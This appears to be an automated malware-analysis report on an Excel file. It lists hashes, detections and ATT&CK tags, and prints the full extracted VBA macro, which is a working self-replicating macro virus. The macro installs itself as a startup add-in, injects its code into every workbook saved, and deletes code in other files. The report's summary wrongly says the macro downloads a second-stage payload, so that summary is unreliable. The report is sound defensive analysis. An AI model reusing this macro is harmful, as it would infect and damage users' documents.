Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6fa7373b935857b9…

MALICIOUS

Office (OLE)

77.5 KB Created: 2003-11-09 04:40:55 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 03b3e52fc695c75aedd9a095fd9ce42b SHA-1: 4e6bbe8d27be61811d22a2988908ef9b74e8851f SHA-256: 6fa7373b935857b9963287a77c48478ede620e2b6bb26dd2c7aa486ce77846ce
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Excel file containing a Workbook_Open VBA macro. This macro attempts to download and execute a second-stage payload named '0KILLBASE.XLS' from the startup path. It also checks for and potentially creates an entry for 'BASE5874.XLS' in the startup path, indicating an attempt to establish persistence.

Heuristics 3

  • ClamAV: Xls.Trojan.AnitiDivi-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.AnitiDivi-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2897 bytes
SHA-256: 38af40163a323d702e588502d6103028d3e9cb524d456a2ad9d432290d466994
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True













Private WithEvents mapp As Application
Attribute mapp.VB_VarHelpID = -1













Private Const cstrKillEngine      As String = "0KILLBASE.XLS"

Private Sub Workbook_Open()
Dim BaseName As String
Dim myName As String
Dim wbkKillEngine As Workbook
Dim strKillEngine As String

BaseName = Application.StartupPath + "\BASE5874.XLS"

If Len(Dir(BaseName)) <> 0 Then
    Set x = Application.Workbooks.Open(BaseName)
    x.Close
    Kill BaseName
    MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
End If
strKillEngine = UCase$(Application.StartupPath + "\" + cstrKillEngine)

If UCase$(Me.FullName) = strKillEngine Then
    If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath
    Set mapp = Application
ElseIf Len(Dir(strKillEngine)) = 0 Then
    Application.ScreenUpdating = False
    Set wbkKillEngine = Workbooks.Add
    wbkKillEngine.IsAddin = True
    Intrude wbkKillEngine
    wbkKillEngine.SaveAs strKillEngine, xlAddIn
    wbkKillEngine.Close
    Application.ScreenUpdating = True
End If

End Sub

Private Sub mapp_WorkbookOpen(ByVal Wb As Workbook)
  Dim cmdTarget As Object
  
  On Error Resume Next
  Set cmdTarget = Wb.VBProject.VBComponents("ThisWorkbook").CodeModule
  If cmdTarget.Find("Private Const cstrEngine      As String =", 1, 1, 20, 41) Then
    cmdTarget.DeleteLines 1, cmdTarget.CountOfLines
    Wb.Save
    MsgBox "祇瞷<BASE5874>痜瑀,�w睲埃!!", vbInformation, "ㄓ��0KillBase�捍%�"
  End If

End Sub
Private Function Intrude(wbkTarget As Workbook) As Boolean
  Dim cmdSource As Object
  Dim cmdTarget As Object
  On Error Resume Next
  Intrude = False
  Set cmdSource = Me.VBProject.VBComponents("ThisWorkbook").CodeModule
  Set cmdTarget = wbkTarget.VBProject.VBComponents("ThisWorkbook").CodeModule
  If cmdTarget.CountOfLines <= 2 Then
    cmdTarget.DeleteLines 1, cmdSource.CountOfLines
    cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)
    Intrude = True
  End If
End Function
Private Sub mapp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
  On Error Resume Next
  Intrude Wb
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True